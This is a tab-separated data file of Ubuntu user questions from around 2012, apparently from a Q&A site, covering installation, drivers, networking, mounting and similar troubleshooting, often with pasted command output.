176988	installtion nightmare on imac	well i have searched far and wide for some solutions but i decided to take all the problems i have had into one . first i have a 27 '' apple imac ( late 2009 release ) running a intel i7 , 4gb of ram , and ati radeon hd 4850 card with the standard airport extreme 2 which is running mac os x lion ( 10.7.4 ) i checked the hardware support and ubuntu seems to be ok after some tweaking . so here is what i did in the exact order based on some lengthy research . first i downloaded refit ( version .14 ) and installed it . i did a quick halt and reboot and it work . next i was n't sure whether to trust ubuntu to parition my main drive or handle it myself . so i decided to go for the self partitioning . did you know that partitioning on lion is not like partitioning on leopard ? i ended up reparing the disk and rebooting into recovery mode and making the partitions there . i have a 1tb hard and i slipt it up as so ( approx . ) macos = 575 exfat ( i called it data ) 350 and 75gb free space . next i downloaded the 64 bit version of the newest ubuntu release ubuntu 12.04.iso and burnt it to disk using the slowest write speed . next i inserted the disk and restarted the and held `` c '' it booted to from the cd and i was at the first menu in the ubuntu phase . i first selected the language then install ubuntu . immediatly the screen went black but the disc was still reading . i immediatly realized this was either a gui issue or a display issue . so i did some research and found out about the 'nomodeset ' i did that and the install ran well . at least i thought . i restarted the mac and waited for the efi boot menu or grub menu . nothing . so i shutdown and powered up again and this time held 'alt ' the menu came up and i selected the windows disk and then it went to the grub menu and i then had the choice again . i chose ubuntu obviously . purple screen popped up thenn ! command line . i figured the disk failed and so i connected to my wifi and then proceed to update and then install the ubuntu desktop . i tried running the startx command but got nothing esc and f6 failed me and so i shutdown . when i rebooted the mac goes straight to os x . its quit bothersome and i am surprise that this is this difficult . i suspect the recovery drive lion create is to blame .
176992	install ubuntu 12.04 in ntfs or fat partition	install ubuntu 12.04 in ntfs or fat partition , i wa n't to install ubuntu 12.04 without converting to ext4 partition.. is that is possible ?
176994	how to connect by mobile broadband ?	how i can connect with mobile broadband as reber quick in iraqi kurdistan regional ? it 's not working in ubuntu 12.04 . it 's user and password is : reber
176996	dropbox install fails in 12.04 tls ( 32 bit )	in ubuntu i choose the `` try ubuntu '' mode . every time i try to install db via download from the db-site and software center it confirms as `` intalled '' . but the dropbox is nowhere to be found . it is not in the list of intalled programs ... would appreciate any ideas . hope to get the hang of linux as an os soon !
176997	how to preview workspaces ?	is it possible to preview workspaces ? when i press down ctrl+alt+ , it shows a preview of all workspaces until i release the keys . is it possible see just the preview before having to switch ?
177000	samsung qx410-j01 touchpad is not working	i have been using ubuntu on a samsung qx410-j01 laptop for ~2 years ( mostly v11.04 ) . yesterday , i upgraded to 11.10 and eventually to 12.04 . now , only the left click on the touchpad works . i can not use right click . i can not drag or resize any windows . i would appreciate any help . i tried to use synclient . it did not change . here are the current settings : leftedge = 117 rightedge = 2817 topedge = 88 bottomedge = 4000 fingerlow = 1 fingerhigh = 1 fingerpress = 256 maxtaptime = 180 maxtapmove = 147 maxdoubletaptime = 180 singletaptimeout = 180 clicktime = 100 fasttaps = 0 emulatemidbuttontime = 75 emulatetwofingerminz = 282 emulatetwofingerminw = 7 vertscrolldelta = 67 horizscrolldelta = 67 vertedgescroll = 1 horizedgescroll = 0 cornercoasting = 0 verttwofingerscroll = 1 horiztwofingerscroll = 0 minspeed = 1 maxspeed = 1.75 accelfactor = 0.0596 trackstickspeed = 40 edgemotionminz = 30 edgemotionmaxz = 160 edgemotionminspeed = 1 edgemotionmaxspeed = 268 edgemotionusealways = 0 touchpadoff = 2 lockeddrags = 0 lockeddragtimeout = 5000 rtcornerbutton = 2 rbcornerbutton = 3 ltcornerbutton = 0 lbcornerbutton = 0 tapbutton1 = 1 tapbutton2 = 3 tapbutton3 = 0 clickfinger1 = 1 clickfinger2 = 1 clickfinger3 = 0 circularscrolling = 0 circscrolldelta = 0.100007 circscrolltrigger = 0 circularpad = 0 palmdetect = 1 palmminwidth = 8 palmminz = 100 coastingspeed = 20 coastingfriction = 50 pressuremotionminz = 30 pressuremotionmaxz = 160 pressuremotionminfactor = 1 pressuremotionmaxfactor = 1 resolutiondetect = 1 grabeventdevice = 1 tapanddraggesture = 1 arealeftedge = 0 arearightedge = 0 areatopedge = 0 areabottomedge = 4445 horizhysteresis = 16 verthysteresis = 16 clickpad = 0
177002	ubuntu server edition wo n't boot with second hard drive plugged in	i have a fresh install of ubuntu server edition running on my home server . i can not ( for the life of me ) get it to boot with a second hard drive plugged in . i have checked boot priority and made sure that it is not trying to boot from the hitachi 1tb drive . it is trying to boot from the 500gb drive with the install of ubuntu . when the second drive is plugged in , it just sticks at a screen with a white dash . if i turn off the computer ( by force , there is no way to turn it off yet ) and unplug either the power or sata to the second drive , the server boots within seconds of seeing grub . i am not sure what to do , i have tried reinstalling ubuntu . i am not sure if this is a bug within ubuntu . i am using the latest version of the server edition with all of the updates , etc . i have made sure all of my packages are updated .
177003	how to automount removable devices with options ?	i 'd like to automount ( using the xfce desktop ) usb devices with btrfs . this works as with any other filesystem just by plugging it in and waiting for two or three seconds for it to appear under /media/ ... unfortunately , it is mounted with the default mount options only . i would like to mount it with additional options , e.g . compress . how would i do that ? i 've tried to add an entry with uuid= ... to /etc/fstab . it then mounts with the wanted option , but not automatically anymore . i need to manually call udisks -- mount /dev/sdb1 then . formerly , gnome had entries like /system/storage/default_options/ext3/mount_options where the default mount options could be configured , but i did not see that under xfce , and it applies to all filesystems of that type . so this boils down to the question : how can i have specific options configured in /etc/fstab and still have xfce automount the device ?
177005	how to optirun .sh file ?	i managed to get as far as optirun glxgear , which worked perfectly , but i am unable to define settings for a specific shell script . in its wiki it says this : optirun [ options ] < application > [ application-parameters ] and i do n't know what option has to be nor the application-parameter . ( i 'm really new ) if my file is /home/hon/hon.sh , how can i execute it via terminal ? if i just type optirun hon or optirun hon.sh it shows this error : /usr/bin/vglrun : 296 : exec : hon : not found there i try to find the file /usr/bin/vglrun . how can i run the shell scripts i need to run ?
177007	video quality too bad while playing ( any ) videos in intel gm965/gl960 integrated graphics controller ubuntu 12.04	i have searched blogs and forums , installed several drivers , but ca n't find a solution that can provide equivalent video quality as that of windows 7 . kindly help . video quality specially color is too bad while playing with any media player . configuration details are : ubuntu - 12.04 intel corporation mobile gm965/gl960 integrated the results of the following commands are a ) sudo lspci | grep vga 00:02.0 vga compatible controller : intel corporation mobile gm965/gl960 integrated graphics controller ( primary ) ( rev 0c ) b ) find /dev -group video /dev/fb0 /dev/dri/card0 /dev/dri/controld64 /dev/agpgart c ) glxinfo | grep -i vendor server glx vendor string : sgi client glx vendor string : ati opengl vendor string : tungsten graphics , inc d ) sudo lshw -c video *-display:0 description : vga compatible controller product : mobile gm965/gl960 integrated graphics controller ( primary ) vendor : intel corporation physical id : 2 bus info : pci @ 0000:00:02.0 version : 0c width : 64 bits clock : 33mhz capabilities : msi pm vga_controller bus_master cap_list rom configuration : driver=i915 latency=0 resources : irq:44 memory : fea00000-feafffff memory : e0000000-efffffff ioport : efe8 ( size=8 ) *-display:1 unclaimed description : display controller product : mobile gm965/gl960 integrated graphics controller ( secondary ) vendor : intel corporation physical id : 2.1 bus info : pci @ 0000:00:02.1 version : 0c width : 64 bits clock : 33mhz capabilities : pm bus_master cap_list configuration : latency=0 resources : memory : feb00000-febfffff i have spent days installing various drivers , and then un-installing but ca n't come up with a solution . please help .
177010	broken dependencies after installing skype	after installing skype my dependencies are broken . i tried to run apt-get -f install but i only get error messages . i am running ubuntu 12.04 on amd64 . if you need more informations please tell me . the following packages have unmet dependencies : libasound2-plugins : i386 : depends : libjack-jackd2-0 : i386 ( > = 1.9.5~dfsg-14 ) but it is not going to be installed or libjack-0.116 : i386 get:1 http : //ppa.launchpad.net/dns/sound/ubuntu/ precise/main libjack-jackd2-0 i386 1.9.8~dfsg.2-1precise1 [ 202 kb ] fetched 202 kb in 1s ( 105 kb/s ) unpacking libjack-jackd2-0 : i386 ( from ... /libjack-jackd2-0_1.9.8~dfsg.2-1precise1_i386.deb ) ... dpkg : error processing /var/cache/apt/archives/libjack-jackd2-0_1.9.8~dfsg.2-1precise1_i386.deb ( -- unpack ) : './usr/share/doc/libjack-jackd2-0/buildinfo.gz ' is different from the same file on the system dpkg-deb : error : subprocess paste was killed by signal ( broken pipe ) errors were encountered while processing : /var/cache/apt/archives/libjack-jackd2-0_1.9.8~dfsg.2-1precise1_i386.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 ) thanks for help . maybe its caused lmms , but the problem appeared after installing skype . : )
177018	is mounting hfs+ r/w safe ?	is mounting journaled hfs+ partitions as r/w with hfsprogs and `` -o force '' prams safe ? i mean , will power failure broke filesystem and etc. ? or is it as safe as ntfs on linux ?
177022	auto mount cryptmount/encrypted loop device	because of limitation of filename size of ecryptfs , i decided to use encrypted partition . since i already use ecryptfs , for my home folder , i do n't need the key to be password-protected . i need a script , that can non-interactively mount an encrypted filesystem contained in a given file with a key stored in a binary file . i am open to any working solution to this problem , as long , as i can use sparse file as a backing storage ( so no truecrypt , and no cryptmount-setup ) .
177025	libre office and in line editing	i ca n't know for certain if this problem has been raised and solved before in this forum , as i do n't quite know what the proper term is to describe it . when i go back to previous paragraphs in libre writer and try to add in words , those added words , as they 're typed , erase the letters in front of them in that paragraph , as if taking up that words space . i remember turning this feature off in microsoft word , but i can not remember what it is called nor how to do it . would be great if someone could help me out .
177033	wlan0 does not exist even with wireless driver and ndiswrapper installed	i have a linksys ae1000 usb wireless adapter . i have installed the driver using windows wireless driver and have run ndiswrapper . i get the wireless icon at the top right , but it detects no signal and there is no wlan0 device defined . i am running 12.04 lts . how do i get this crazy thing to work ? the chipset is broadcom bcm4311 .
177034	do i need to install a database before programming in c++ ?	i would like to do database programming in c++ connecting to some database on ubuntu 12.04 lts . do i need to install a database before programming in c++ or does any database gets installed with ubuntu ? if not , may i ask the instructions to install ( e.g sqlite or whichever is the easiest db to install ) any help on this would be great . thanks in advance .
177039	multiple nvidia errors	i am one among many who seem to be having many problems with the current nvidia drivers found in the additional drivers dialog . these issues include blue youtube videos a message saying `` ubuntu has experienced an internal error '' missing or wrong resolutions nvidia-settings forgets my configuration on boot choppy video playback the list goes on . is there a simple fix for all of these as they are related to the same driver ?
177041	nginx - disable autostart	i went througn some manuals and i did n't understand yet . how do i disable autostart nginx service ?
177042	is it possible to install adobe master collection cs5.5 into ubuntu without using a virtual windows ?	i recently decided to install ubuntu , i formatted my pc and i installed both ubuntu and windows . since it is hard sometimes to get games to work in ubuntu ( specially the new ones ) i decided to use windows mostly for games and ubuntu for work applications , such as programming , the adobe suite and whatnot . here 's my question : is there anyway i can use adobe master collection within ubuntu without using virtual mode ? i 've been searching it all over the internet but i get nothing .
177049	problem with upgrade from 11.04 to 11.10	i recently upgraded from 11.04 to 11.10 . however during the upgrade , my laptop shutdown because i forgot to plug in the charger . however after looking online i 've managed to make it work and now the login screen shows 11.10 but when i login , i see no terminal in the launcher or any upgrade manager , plus there are no buttons on the right side at the top , only 1 which shows wifi strength , no apps and dash does n't return results . please help . i have no cd available for live boot but have bootable usb with 12.04 lts .
177055	usb hdd power off after shutdown	i use ubuntu 12.04 on my external usb hdd and from the begining when i power off my ubuntu my usb hdd also power off 5 seconds later than my computer . its good for me . but after some updates ubuntu usb hdd stay power on . where i can set this ? i make changes according your help but problem is again and after restart i have ..power/control in mode on . i am not sure but i think that my hdd is usb1 . petat @ mujlin : ~ $ lsusb bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 003 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 004 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 005 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 006 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 007 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 001 device 003 : id 04e8:342e samsung electronics co. , ltd bus 001 device 004 : id 152d:2509 jmicron technology corp. / jmicron usa technology corp. jms539 superspeed sata ii 3.0g bridge bus 003 device 002 : id 04f3:0103 elan microelectronics corp. petat @ mujlin : ~ $ cat /sys/bus/usb/devices/usb1/power/autosuspend_delay_ms 2000 petat @ mujlin : ~ $ cat /sys/bus/usb/devices/usb1/power/control auto
177056	cant see databases of mysql from command prompt in ubuntu 12.04	1 ) i have installed mysql server and mysql client through apt-get install mysql-server and apt-get install mysql-client 2 ) when i run sudo netstat -tap | grep mysql , i see following : tcp 0 0 localhost : mysql * : * listen 15138/mysqld i think it is running 3 ) now i go to usr/share/mysql and type : show databases ; it shows me following , the program 'show ' is currently not installed . you can install it by typing : apt-get install nmh can anybody please tell me what is the problem ? am i running command from wrong directory ? thanks ,
177058	.xsession-errors file is huge . how can i disable ?	i have visited over 30 different forum questions about this very same issue but none of them have been able to point me in the right direction . i do n't care what is causing the issue . i do n't care what the error messages say . i want to completely disable this from happening . i do n't want to disable all logging on my system just this .xsession-errors file . i have tried the /dev/null thing it does n't work . i made it read-only , just creates a new file .xsession-errors.jkhbjhjh . i even commented out the file generation in /etc/x11/xsession . i 'm running an ecommerce webserver that will be decommissioned in less than 90 days . i just need to keep the sites up long enough to get them all moved over to my new system . this log file is filling up my hdd 2 to 3 times a week rendering my webstores inoperable . just to be clear , i 'd like to know how to disable .xsession-errors logging . i 'm running ubuntu 9.10 with gnome . i know it 's no longer supported but again , this server is being decommissioned in less than 90 days it should n't matter .
177062	need help with reinstall	i have bootable usb with 12.04lts in it.and a corrupt 11.10 in my pc.no windows/or mac only ubuntu.need help with re-install.how do i go about it ?
177067	capture login screen-not sucssecful	i 'm using ubuntu 12.04 . if more information is needed , please tell me . i tried some guides to cature my login screen : how can i take a screenshot of the login screen ? http : //www.howtoforge.com/how-to-take-a-screenshot-of-your-login-screen i tried the first one , but after running : $ sudo bash /tmp/shot.sh > /tmp/shot.xwd i 'm getting this : no protocol specified no protocol specified xwd unable to open display ':0' and i 'm getting an xwd file in my tmp folder . running the other commands giving errors . tried the second one , after running : chvt 8 ; sleep 5 ; xauthority=/var/gdm/:0.xauth display=:0.0 import -window root /tmp/gdm-login-shot.png i got : no protocol specified no protocol specified import : unable to open x server ':0.0 ' @ error/import.c/importimagecommand/366 many thanks for helping ( : edit to vine_user : here the output from the terminal-i cacked it from within the system while i 'm looged in : ubuntu @ precisepangolin : ~ $ echo 'sleep 5 ; display=:0 xauthority=/var/run/lightdm/root/ $ displaydisplay xwd -root ' > /tmp/shot.sh ubuntu @ precisepangolin : ~ $ sudo bash /tmp/shot.sh > /tmp/shot.xwd bash : /tmp/shot.xwd : permission denied ubuntu @ precisepangolin : ~ $ sudo su root @ precisepangolin : /home/ubuntu # sudo bash /tmp/shot.sh > /tmp/shot.xwd no protocol specified no protocol specified xwd : unable to open display ':0' root @ precisepangolin : /home/ubuntu # edit 2 ! : here it is ! : just uploading-this uploadong site is better than other iuset to use ( : :
177069	symlink on a folder inside a mounted drive	ok so i moved from windows to ubuntu 12.04 32bit yesterday and im still learning the folder structure etc of *nix systems . what im trying to do is create a symlink from my 2nd hard drive 's , which is supposed to be mounted in every boot on /media/media , folder named music ( so /media/media/music ) to ~/music . even though it works while im logged when i reboot the symlink breaks . any ideas why ? thanks in advance
177070	dash home in ubuntu 12.04 is empty !	when i press dash home in my ubuntu 12.04 dash window is empty and when i type names of my basic apps ( firefox , ... ) it does n't find it at all that means that i can , t use it . the question is how to reinstall dash or how to fix it another way ?
177079	whats is user 102 which is accessing dbus-daemon	user 102 is not listed , output of cat /etc/passwd root : x:0:0 : root : /root : /bin/bash daemon : x:1:1 : daemon : /usr/sbin : /bin/sh bin : x:2:2 : bin : /bin : /bin/sh sys : x:3:3 : sys : /dev : /bin/sh sync : x:4:65534 : sync : /bin : /bin/sync games : x:5:60 : games : /usr/games : /bin/sh man : x:6:12 : man : /var/cache/man : /bin/sh lp : x:7:7 : lp : /var/spool/lpd : /bin/sh mail : x:8:8 : mail : /var/mail : /bin/sh news : x:9:9 : news : /var/spool/news : /bin/sh uucp : x:10:10 : uucp : /var/spool/uucp : /bin/sh proxy : x:13:13 : proxy : /bin : /bin/sh www-data : x:33:33 : www-data : /var/www : /bin/sh backup : x:34:34 : backup : /var/backups : /bin/sh list : x:38:38 : mailing list manager : /var/list : /bin/sh irc : x:39:39 : ircd : /var/run/ircd : /bin/sh gnats : x:41:41 : gnats bug-reporting system ( admin ) : /var/lib/gnats : /bin/sh nobody : x:65534:65534 : nobody : /nonexistent : /bin/sh libuuid : x:100:101 : :/var/lib/libuuid : /bin/sh syslog : x:101:103 : :/home/syslog : /bin/false messagebus : x:102:105 : :/var/run/dbus : /bin/false colord : x:103:108 : colord colour management daemon , , , :/var/lib/colord : /bin/false usbmux : x:108:46 : usbmux daemon , , , :/home/usbmux : /bin/false pulse : x:110:119 : pulseaudio daemon , , , :/var/run/pulse : /bin/false rtkit : x:111:122 : realtimekit , , , :/proc : /bin/false hplip : x:113:7 : hplip system user , , , :/var/run/hplip : /bin/false saned : x:114:123 : :/home/saned : /bin/false off220 : x:1000:1000 : off220 , , , :/home/off220 : /bin/bash gdm : x:104:111 : gnome display manager : /var/lib/gdm : /bin/false but the output shows there 's a user 102 ps aux | grep -v `whoami` user pid % cpu % mem vsz rss tty stat start time command root 1 0.0 0.0 24332 2248 ? ss 19:43 0:00 /sbin/init root 2 0.0 0.0 0 0 ? s 19:43 0:00 [ kthreadd ] root 3 0.0 0.0 0 0 ? s 19:43 0:00 [ ksoftirqd/0 ] root 5 0.0 0.0 0 0 ? s 19:43 0:00 [ kworker/u:0 ] root 6 0.0 0.0 0 0 ? s 19:43 0:00 [ migration/0 ] root 7 0.0 0.0 0 0 ? s 19:43 0:00 [ watchdog/0 ] root 8 0.0 0.0 0 0 ? s 19:43 0:00 [ migration/1 ] root 10 0.0 0.0 0 0 ? s 19:43 0:00 [ ksoftirqd/1 ] root 11 0.0 0.0 0 0 ? s 19:43 0:00 [ kworker/0:1 ] root 12 0.0 0.0 0 0 ? s 19:43 0:00 [ watchdog/1 ] root 13 0.0 0.0 0 0 ? s 19:43 0:00 [ migration/2 ] root 14 0.0 0.0 0 0 ? s 19:43 0:00 [ kworker/2:0 ] root 15 0.0 0.0 0 0 ? s 19:43 0:00 [ ksoftirqd/2 ] root 16 0.0 0.0 0 0 ? s 19:43 0:00 [ watchdog/2 ] root 17 0.0 0.0 0 0 ? s 19:43 0:00 [ migration/3 ] root 18 0.0 0.0 0 0 ? s 19:43 0:00 [ kworker/3:0 ] root 19 0.0 0.0 0 0 ? s 19:43 0:00 [ ksoftirqd/3 ] root 20 0.0 0.0 0 0 ? s 19:43 0:00 [ watchdog/3 ] root 21 0.0 0.0 0 0 ? s < 19:43 0:00 [ cpuset ] root 22 0.0 0.0 0 0 ? s < 19:43 0:00 [ khelper ] root 23 0.0 0.0 0 0 ? s 19:43 0:00 [ kdevtmpfs ] root 24 0.0 0.0 0 0 ? s < 19:43 0:00 [ netns ] root 26 0.0 0.0 0 0 ? s 19:43 0:00 [ sync_supers ] root 27 0.0 0.0 0 0 ? s 19:43 0:00 [ bdi-default ] root 28 0.0 0.0 0 0 ? s < 19:43 0:00 [ kintegrityd ] root 29 0.0 0.0 0 0 ? s < 19:43 0:00 [ kblockd ] root 30 0.0 0.0 0 0 ? s < 19:43 0:00 [ ata_sff ] root 31 0.0 0.0 0 0 ? s 19:43 0:00 [ khubd ] root 32 0.0 0.0 0 0 ? s < 19:43 0:00 [ md ] root 34 0.0 0.0 0 0 ? s 19:43 0:00 [ khungtaskd ] root 35 0.0 0.0 0 0 ? s 19:43 0:00 [ kswapd0 ] root 36 0.0 0.0 0 0 ? sn 19:43 0:00 [ ksmd ] root 37 0.0 0.0 0 0 ? sn 19:43 0:00 [ khugepaged ] root 38 0.0 0.0 0 0 ? s 19:43 0:00 [ fsnotify_mark ] root 39 0.0 0.0 0 0 ? s 19:43 0:00 [ ecryptfs-kthrea ] root 40 0.0 0.0 0 0 ? s < 19:43 0:00 [ crypto ] root 48 0.0 0.0 0 0 ? s < 19:43 0:00 [ kthrotld ] root 49 0.0 0.0 0 0 ? s 19:43 0:00 [ scsi_eh_0 ] root 50 0.0 0.0 0 0 ? s 19:43 0:00 [ scsi_eh_1 ] root 52 0.0 0.0 0 0 ? s 19:43 0:00 [ scsi_eh_2 ] root 53 0.0 0.0 0 0 ? s 19:43 0:00 [ scsi_eh_3 ] root 54 0.0 0.0 0 0 ? s 19:43 0:00 [ kworker/u:3 ] root 75 0.0 0.0 0 0 ? s < 19:43 0:00 [ devfreq_wq ] root 76 0.0 0.0 0 0 ? s 19:43 0:00 [ kworker/0:2 ] root 77 0.0 0.0 0 0 ? s 19:43 0:00 [ kworker/1:1 ] root 273 0.0 0.0 0 0 ? s 19:43 0:00 [ jbd2/sda3-8 ] root 274 0.0 0.0 0 0 ? s < 19:43 0:00 [ ext4-dio-unwrit ] root 354 0.0 0.0 17224 640 ? s 19:43 0:00 upstart-udev-bridge -- daemon root 358 0.0 0.0 21828 1584 ? ss 19:43 0:00 /sbin/udevd -- daemon root 412 0.0 0.0 21784 1152 ? s 19:43 0:00 /sbin/udevd -- daemon root 413 0.0 0.0 21732 1056 ? s 19:43 0:00 /sbin/udevd -- daemon root 463 0.0 0.0 0 0 ? s < 19:43 0:00 [ kpsmoused ] root 570 0.0 0.0 0 0 ? s < 19:43 0:00 [ hd-audio0 ] root 730 0.0 0.0 15180 400 ? s 19:43 0:00 upstart-socket-bridge -- daemon root 748 0.0 0.0 0 0 ? s 19:43 0:00 [ kworker/3:2 ] root 764 0.0 0.0 0 0 ? s 19:43 0:00 [ kworker/1:2 ] root 788 0.0 0.0 0 0 ? s 19:43 0:00 [ jbd2/sda2-8 ] root 789 0.0 0.0 0 0 ? s < 19:43 0:00 [ ext4-dio-unwrit ] root 801 0.0 0.0 0 0 ? s 19:43 0:00 [ jbd2/sda4-8 ] root 802 0.0 0.0 0 0 ? s < 19:43 0:00 [ ext4-dio-unwrit ] 102 828 0.0 0.0 24744 1884 ? ss 19:43 0:00 dbus-daemon -- system -- fork -- activation=upstart syslog 833 0.0 0.0 249464 1548 ? sl 19:43 0:00 rsyslogd -c5 root 865 0.0 0.0 7256 604 ? ss 19:43 0:00 dhclient3 -e if_metric=100 -pf /var/run/dhclient.eth0.pid -lf /var/lib/dhcp/dhclient.eth0.leases -1 eth0 root 980 0.0 0.0 17780 904 tty4 ss+ 19:43 0:00 /sbin/getty -8 38400 tty4 root 982 0.0 0.0 17780 908 tty5 ss+ 19:43 0:00 /sbin/getty -8 38400 tty5 root 994 0.0 0.0 17780 908 tty2 ss+ 19:43 0:00 /sbin/getty -8 38400 tty2 root 998 0.0 0.0 17780 904 tty3 ss+ 19:43 0:00 /sbin/getty -8 38400 tty3 root 1004 0.0 0.0 17780 900 tty6 ss+ 19:43 0:00 /sbin/getty -8 38400 tty6 root 1015 0.0 0.0 130900 3016 ? ssl 19:43 0:00 gdm-binary root 1036 0.0 0.0 144868 4020 ? sl 19:43 0:00 /usr/lib/gdm/gdm-simple-slave -- display-id /org/gnome/displaymanager/display1 daemon 1038 0.0 0.0 16900 376 ? ss 19:43 0:00 atd root 1039 0.0 0.0 19104 1024 ? ss 19:43 0:00 cron root 1130 2.6 0.3 145504 25804 tty7 ss+ 19:43 2:16 /usr/bin/xorg :0 -background none -verbose -auth /var/run/gdm/auth-for-gdm-x1hekf/database -nolisten tcp vt7 root 1197 0.0 0.0 0 0 ? s < 19:43 0:00 [ iprt ] root 1236 0.5 0.0 20476 4832 ? sns 19:43 0:29 /usr/sbin/preload -s /var/lib/preload/preload.state root 2555 0.0 0.0 2091628 3876 ? sl 19:43 0:00 /usr/sbin/console-kit-daemon -- no-daemon root 2622 0.0 0.0 200352 4032 ? sl 19:43 0:00 /usr/lib/policykit-1/polkitd -- no-debug root 2649 0.0 0.0 219860 4232 ? sl 19:43 0:00 /usr/lib/upower/upowerd rtkit 2792 0.0 0.0 168864 1344 ? snl 19:43 0:00 /usr/lib/rtkit/rtkit-daemon root 2805 0.0 0.0 121528 3700 ? sl 19:43 0:00 /usr/lib/accountsservice/accounts-daemon root 2813 0.0 0.0 0 0 ? s 19:43 0:00 [ flush-8:0 ] root 2816 0.0 0.0 17780 908 tty1 ss+ 19:43 0:00 /sbin/getty -8 38400 tty1 root 2819 0.0 0.0 180348 3992 ? sl 19:44 0:00 /usr/lib/gdm/gdm-session-worker root 4081 0.0 0.0 193364 3856 ? sl 19:44 0:00 /usr/lib/udisks/udisks-daemon root 4085 0.0 0.0 45512 804 ? s 19:44 0:00 udisks-daemon : not polling any devices root 4494 0.0 0.0 0 0 ? s 20:30 0:00 [ kworker/2:1 ] root 11407 0.0 0.0 112888 3080 ? sl 19:58 0:00 /usr/sbin/system-tools-backends root 11410 0.0 0.2 58884 19032 ? s 19:58 0:00 /usr/bin/perl /usr/share/system-tools-backends-2.0/scripts/systemtoolsbackends.pl -m platform root 18649 0.2 1.2 569448 96392 ? sl 19:49 0:10 /usr/sbin/synaptic root 18659 0.0 0.0 26548 784 ? s 19:49 0:00 dbus-launch -- autolaunch=51015c1973c6bd697d07027500000008 -- binary-syntax -- close-stderr root 18660 0.0 0.0 23808 696 ? ss 19:49 0:00 //bin/dbus-daemon -- fork -- print-pid 5 -- print-address 7 -- session what is this user for ? why is it not listed in passwd ? ( sorry for formatting , ca n't get it to work )
177083	wifi and ethernet connectivity problems after upgrading to 12.04	i upgraded recently to ubuntu 12.04 from 11.10 , and since then i have n't been able to connect to internet , neither using wifi , nor using ethernet . i 've been reading many posts , but not finding a solution in any . my laptop is a 64-bit hp-g61 , my wifi card a atheros ar9285 and my ethernet card a realtek rtl 8101e/rtl8102e . before i upgraded everything worked fine . i have tried to perform a manual network configuration using the terminal , but it did n't work . has anyone an idea of how can i fix the problem ? is it possible to switch back to the old working 11.10 ? thank you very much in advance , i attach the output of some commands toni @ toni-hp-g61-notebook-pc : ~/documents $ ifconfig lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:2880 errors:0 dropped:0 overruns:0 frame:0 tx packets:2880 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:202958 ( 202.9 kb ) tx bytes:202958 ( 202.9 kb ) wlan0 link encap : ethernet hwaddr 90:4c : e5:58 : b4:59 up broadcast multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) wlan0 : avahi link encap : ethernet hwaddr 90:4c : e5:58 : b4:59 inet addr:169.254.8.172 bcast:169.254.255.255 mask:255.255.0.0 up broadcast multicast mtu:1500 metric:1 toni @ toni-hp-g61-notebook-pc : ~/documents $ iwconfig lo no wireless extensions . wlan0 ieee 802.11bgn essid : '' wlan_a514 '' mode : managed access point : not-associated tx-power=14 dbm retry long limit:7 rts thr : off fragment thr : off power management : off toni @ toni-hp-g61-notebook-pc : ~/documents $ rfkill list 0 : phy0 : wireless lan soft blocked : no hard blocked : no 1 : hp-wifi : wireless lan soft blocked : no hard blocked : no toni @ toni-hp-g61-notebook-pc : ~/documents $ sudo lshw -c network [ sudo ] password for toni : *-network description : wireless interface product : ar9285 wireless network adapter ( pci-express ) vendor : atheros communications inc. physical id : 0 bus info : pci @ 0000:02:00.0 logical name : wlan0 version : 01 serial : 90:4c : e5:58 : b4:59 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=ath9k driverversion=3.2.0-27-generic firmware=n/a latency=0 link=no multicast=yes wireless=ieee 802.11bgn resources : irq:16 memory : d6000000-d600ffff *-network unclaimed description : ethernet controller product : rtl8101e/rtl8102e pci express fast ethernet controller vendor : realtek semiconductor co. , ltd. physical id : 0 bus info : pci @ 0000:03:00.0 version : 02 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress msix vpd bus_master cap_list configuration : latency=0 resources : ioport:2000 ( size=256 ) memory : d4010000-d4010fff memory : d4000000-d400ffff memory : d4020000-d402ffff toni @ toni-hp-g61-notebook-pc : ~/documents $ cat /etc/modprobe.d/ath9k.conf options ath9k nohwcrypt=1 toni @ toni-hp-g61-notebook-pc : ~/documents $ lspci 00:00.0 host bridge : intel corporation mobile 4 series chipset memory controller hub ( rev 07 ) 00:01.0 pci bridge : intel corporation mobile 4 series chipset pci express graphics port ( rev 07 ) 00:1a.0 usb controller : intel corporation 82801i ( ich9 family ) usb uhci controller # 4 ( rev 03 ) 00:1a.1 usb controller : intel corporation 82801i ( ich9 family ) usb uhci controller # 5 ( rev 03 ) 00:1a.7 usb controller : intel corporation 82801i ( ich9 family ) usb2 ehci controller # 2 ( rev 03 ) 00:1b.0 audio device : intel corporation 82801i ( ich9 family ) hd audio controller ( rev 03 ) 00:1c.0 pci bridge : intel corporation 82801i ( ich9 family ) pci express port 1 ( rev 03 ) 00:1c.1 pci bridge : intel corporation 82801i ( ich9 family ) pci express port 2 ( rev 03 ) 00:1d.0 usb controller : intel corporation 82801i ( ich9 family ) usb uhci controller # 1 ( rev 03 ) 00:1d.1 usb controller : intel corporation 82801i ( ich9 family ) usb uhci controller # 2 ( rev 03 ) 00:1d.2 usb controller : intel corporation 82801i ( ich9 family ) usb uhci controller # 3 ( rev 03 ) 00:1d.3 usb controller : intel corporation 82801i ( ich9 family ) usb uhci controller # 6 ( rev 03 ) 00:1d.7 usb controller : intel corporation 82801i ( ich9 family ) usb2 ehci controller # 1 ( rev 03 ) 00:1e.0 pci bridge : intel corporation 82801 mobile pci bridge ( rev 93 ) 00:1f.0 isa bridge : intel corporation ich9m lpc interface controller ( rev 03 ) 00:1f.2 sata controller : intel corporation 82801ibm/iem ( ich9m/ich9m-e ) 4 port sata controller [ ahci mode ] ( rev 03 ) 00:1f.3 